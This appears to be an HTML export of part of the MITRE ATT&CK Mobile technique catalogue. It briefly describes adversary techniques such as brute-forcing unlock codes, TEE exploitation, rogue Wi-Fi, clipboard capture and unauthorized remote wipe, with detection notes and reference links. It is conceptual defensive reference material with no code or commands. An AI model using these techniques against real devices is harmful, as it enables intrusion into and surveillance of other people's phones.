<h3 id="_device_unlock_code_guessing_or_brute_force_mob_t1062"><a class="anchor" href="#_device_unlock_code_guessing_or_brute_force_mob_t1062"></a><a class="link" href="#_device_unlock_code_guessing_or_brute_force_mob_t1062">Device Unlock Code Guessing or Brute Force - MOB-T1062</a></h3>
<div class="paragraph">
<p>An adversary could make educated guesses of the device lock screen&#8217;s PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1379. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1062">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1062</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.popsci.com/box-can-figure-out-your-4-digit-iphone-passcode">http://www.popsci.com/box-can-figure-out-your-4-digit-iphone-passcode</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_tee_vulnerability_mob_t1008"><a class="anchor" href="#_exploit_tee_vulnerability_mob_t1008"></a><a class="link" href="#_exploit_tee_vulnerability_mob_t1008">Exploit TEE Vulnerability - MOB-T1008</a></h3>
<div class="paragraph">
<p>A malicious app or other attack vector could be used to exploit vulnerabilities in code running within the Trusted Execution Environment (TEE) (Citation: Thomas-TrustZone). The adversary could then obtain privileges held by the TEE potentially including the ability to access cryptographic keys or other sensitive data (Citation: QualcommKeyMaster). Escalated operating system privileges may be first required in order to have the ability to attack the TEE (Citation: EkbergTEE). If not, privileges within the TEE can potentially be used to exploit the operating system (Citation: laginimaineb-TEE).</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1380. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1008">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://usmile.at/symposium/program/2015/thomas-holmes">https://usmile.at/symposium/program/2015/thomas-holmes</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html">https://bits-please.blogspot.in/2016/06/extracting-qualcomms-keymaster-keys.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://usmile.at/symposium/program/2015/ekberg">https://usmile.at/symposium/program/2015/ekberg</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html">http://bits-please.blogspot.co.il/2016/05/war-of-worlds-hijacking-linux-kernel.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rogue_wi_fi_access_points_mob_t1068"><a class="anchor" href="#_rogue_wi_fi_access_points_mob_t1068"></a><a class="link" href="#_rogue_wi_fi_access_points_mob_t1068">Rogue Wi-Fi Access Points - MOB-T1068</a></h3>
<div class="paragraph">
<p>An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication as described in NIST SP 800-153 (Citation: NIST-SP800153).</p>
</div>
<div class="paragraph">
<p>For example, Kaspersky describes a threat actor they call DarkHotel that targeted hotel Wi-Fi networks, using them to compromise computers belonging to business executives (Citation: Kaspersky-DarkHotel).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1381. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1068">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1068</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html">https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf">http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.kaspersky.com/darkhotel-apt/6613/">https://blog.kaspersky.com/darkhotel-apt/6613/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remotely_track_device_without_authorization_mob_t1071"><a class="anchor" href="#_remotely_track_device_without_authorization_mob_t1071"></a><a class="link" href="#_remotely_track_device_without_authorization_mob_t1071">Remotely Track Device Without Authorization - MOB-T1071</a></h3>
<div class="paragraph">
<p>An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google&#8217;s Android Device Manager or Apple iCloud&#8217;s Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.</p>
</div>
<div class="paragraph">
<p>Detection: Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1382. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1071">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1071</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html">https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_biometric_spoofing_mob_t1063"><a class="anchor" href="#_biometric_spoofing_mob_t1063"></a><a class="link" href="#_biometric_spoofing_mob_t1063">Biometric Spoofing - MOB-T1063</a></h3>
<div class="paragraph">
<p>An adversary could attempt to spoof a mobile device&#8217;s biometric authentication mechanism, for example by providing a fake fingerprint as described by SRLabs in (Citation: SRLabs-Fingerprint).</p>
</div>
<div class="paragraph">
<p>iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1383. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1063">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1063</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://srlabs.de/bites/spoofing-fingerprints/">https://srlabs.de/bites/spoofing-fingerprints/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.apple.com/en-us/HT204587">https://support.apple.com/en-us/HT204587</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jamming_or_denial_of_service_mob_t1067"><a class="anchor" href="#_jamming_or_denial_of_service_mob_t1067"></a><a class="link" href="#_jamming_or_denial_of_service_mob_t1067">Jamming or Denial of Service - MOB-T1067</a></h3>
<div class="paragraph">
<p>An attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating as described in draft NIST SP 800-187 (Citation: NIST-SP800187).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1384. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1067">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1067</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html">https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html">https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://csrc.nist.gov/publications/drafts/800-187/sp800%20187%20draft.pdf">http://csrc.nist.gov/publications/drafts/800-187/sp800%20187%20draft.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_capture_clipboard_data_mob_t1017"><a class="anchor" href="#_capture_clipboard_data_mob_t1017"></a><a class="link" href="#_capture_clipboard_data_mob_t1017">Capture Clipboard Data - MOB-T1017</a></h3>
<div class="paragraph">
<p>A malicious app or other attack vector could capture sensitive data stored in the device clipboard, for example passwords being copy-and-pasted from a password manager app.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1385. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1017">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1017</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_access_contact_list_mob_t1035"><a class="anchor" href="#_access_contact_list_mob_t1035"></a><a class="link" href="#_access_contact_list_mob_t1035">Access Contact List - MOB-T1035</a></h3>
<div class="paragraph">
<p>An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.</p>
</div>
<div class="paragraph">
<p>Detection: On both Android (6.0 and up) and iOS, the user can view which applications have permission to access contact list information through the device settings screen, and the user can choose to revoke the permissions.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1386. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1035">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1035</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stolen_developer_credentials_or_signing_keys_mob_t1044"><a class="anchor" href="#_stolen_developer_credentials_or_signing_keys_mob_t1044"></a><a class="link" href="#_stolen_developer_credentials_or_signing_keys_mob_t1044">Stolen Developer Credentials or Signing Keys - MOB-T1044</a></h3>
<div class="paragraph">
<p>An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer&#8217;s identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).</p>
</div>
<div class="paragraph">
<p>Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer&#8217;s identity.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1387. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1044">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1044</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.infoworld.com/article/2854963/mobile-development/how-to-keep-your-app-store-dev-account-from-being-hijacked.html">http://www.infoworld.com/article/2854963/mobile-development/how-to-keep-your-app-store-dev-account-from-being-hijacked.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_traffic_capture_or_redirection_mob_t1013"><a class="anchor" href="#_network_traffic_capture_or_redirection_mob_t1013"></a><a class="link" href="#_network_traffic_capture_or_redirection_mob_t1013">Network Traffic Capture or Redirection - MOB-T1013</a></h3>
<div class="paragraph">
<p>An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.</p>
</div>
<div class="paragraph">
<p>A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.</p>
</div>
<div class="paragraph">
<p>Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.</p>
</div>
<div class="paragraph">
<p>An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device&#8217;s proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.</p>
</div>
<div class="paragraph">
<p>If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.</p>
</div>
<div class="paragraph">
<p>Detection: On both Android and iOS the user must grant consent to an app to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is in place.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1388. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1013">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/">https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_access_sensitive_data_or_credentials_in_files_mob_t1012"><a class="anchor" href="#_access_sensitive_data_or_credentials_in_files_mob_t1012"></a><a class="link" href="#_access_sensitive_data_or_credentials_in_files_mob_t1012">Access Sensitive Data or Credentials in Files - MOB-T1012</a></h3>
<div class="paragraph">
<p>An adversary could attempt to read files that contain sensitive data or credentials (e.g., private keys, passwords, access tokens). This technique requires either escalated privileges or for the targeted app to have stored the data in an insecure manner (e.g., with insecure file permissions or in an insecure location such as an external storage directory).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1389. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1012">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1012</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html">https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_trusted_execution_environment_mob_t1002"><a class="anchor" href="#_modify_trusted_execution_environment_mob_t1002"></a><a class="link" href="#_modify_trusted_execution_environment_mob_t1002">Modify Trusted Execution Environment - MOB-T1002</a></h3>
<div class="paragraph">
<p>If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device&#8217;s Trusted Execution Environment (TEE) or other similar isolated execution environment where the code can evade detection, may persist after device resets, and may not be removable by the device user. Running code within the TEE may provide an adversary with the ability to monitor or tamper with overall device behavior.</p>
</div>
<div class="paragraph">
<p>Thomas Roth describes the potential for placing a rootkit within the TrustZone secure world (Citation: Roth-Rootkits).</p>
</div>
<div class="paragraph">
<p>Detection: Devices may perform cryptographic integrity checks of code running within the TEE at boot time.</p>
</div>
<div class="paragraph">
<p>As described in the iOS Security Guide (Citation: Apple-iOSSecurityGuide), iOS devices will fail to boot if the software running within the Secure Enclave does not pass signature verification.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1390. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1002">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf">https://hackinparis.com/data/slides/2013/Slidesthomasroth.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.apple.com/business/docs/iOS%20Security%20Guide.pdf">https://www.apple.com/business/docs/iOS%20Security%20Guide.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_downgrade_to_insecure_protocols_mob_t1069"><a class="anchor" href="#_downgrade_to_insecure_protocols_mob_t1069"></a><a class="link" href="#_downgrade_to_insecure_protocols_mob_t1069">Downgrade to Insecure Protocols - MOB-T1069</a></h3>
<div class="paragraph">
<p>An adversary could cause the mobile device to use less secure protocols, for example by jamming frequencies used by newer protocols such as LTE and only allowing older protocols such as GSM to communicate as described in draft NIST SP 800-187 (Citation: NIST-SP800187). Use of less secure protocols may make communication easier to eavesdrop upon or manipulate.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1391. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1069">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1069</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://csrc.nist.gov/publications/drafts/800-187/sp800%20187%20draft.pdf">http://csrc.nist.gov/publications/drafts/800-187/sp800%20187%20draft.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_generate_fraudulent_advertising_revenue_mob_t1075"><a class="anchor" href="#_generate_fraudulent_advertising_revenue_mob_t1075"></a><a class="link" href="#_generate_fraudulent_advertising_revenue_mob_t1075">Generate Fraudulent Advertising Revenue - MOB-T1075</a></h3>
<div class="paragraph">
<p>An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1392. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1075">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1075</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_app_auto_start_at_device_boot_mob_t1005"><a class="anchor" href="#_app_auto_start_at_device_boot_mob_t1005"></a><a class="link" href="#_app_auto_start_at_device_boot_mob_t1005">App Auto-Start at Device Boot - MOB-T1005</a></h3>
<div class="paragraph">
<p>An Android application can listen for the BOOT_COMPLETED broadcast, ensuring that the app&#8217;s functionality will be activated every time the device starts up without having to wait for the device user to manually start the app.</p>
</div>
<div class="literalblock">
<div class="content">
<pre>(Citation: Zhou) and Jiang (Citation: Zhou) analyzed 1260 Android malware samples belonging to 49 families of malware, and determined that 29 malware families and 83.3% of the samples listened for BOOT_COMPLETED.</pre>
</div>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1393. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1005">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1005</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://ieeexplore.ieee.org/document/6234407">http://ieeexplore.ieee.org/document/6234407</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_commonly_used_port_mob_t1039"><a class="anchor" href="#_commonly_used_port_mob_t1039"></a><a class="link" href="#_commonly_used_port_mob_t1039">Commonly Used Port - MOB-T1039</a></h3>
<div class="paragraph">
<p>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)</p>
</div>
<div class="paragraph">
<p>They may use the protocol associated with the port or a completely different protocol.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1394. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1039">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1039</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_manipulate_app_store_rankings_or_ratings_mob_t1055"><a class="anchor" href="#_manipulate_app_store_rankings_or_ratings_mob_t1055"></a><a class="link" href="#_manipulate_app_store_rankings_or_ratings_mob_t1055">Manipulate App Store Rankings or Ratings - MOB-T1055</a></h3>
<div class="paragraph">
<p>An adversary could use access to a compromised device&#8217;s credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1395. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1055">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1055</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_access_calendar_entries_mob_t1038"><a class="anchor" href="#_access_calendar_entries_mob_t1038"></a><a class="link" href="#_access_calendar_entries_mob_t1038">Access Calendar Entries - MOB-T1038</a></h3>
<div class="paragraph">
<p>An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.</p>
</div>
<div class="paragraph">
<p>Detection: On both Android (6.0 and up) and iOS, the user can view which applications have permission to access calendar information through the device settings screen, and the user can choose to revoke the permissions.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1396. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1038">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1038</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remotely_wipe_data_without_authorization_mob_t1072"><a class="anchor" href="#_remotely_wipe_data_without_authorization_mob_t1072"></a><a class="link" href="#_remotely_wipe_data_without_authorization_mob_t1072">Remotely Wipe Data Without Authorization - MOB-T1072</a></h3>
<div class="paragraph">
<p>An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. Google&#8217;s Android Device Manager or Apple iCloud&#8217;s Find my iPhone) or to an EMM console could use that access to wipe enrolled devices (Citation: Honan-Hacking).</p>
</div>
<div class="paragraph">
<p>Detection: Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1397. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1072">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1072</a></p></td>
</tr>
<tr>
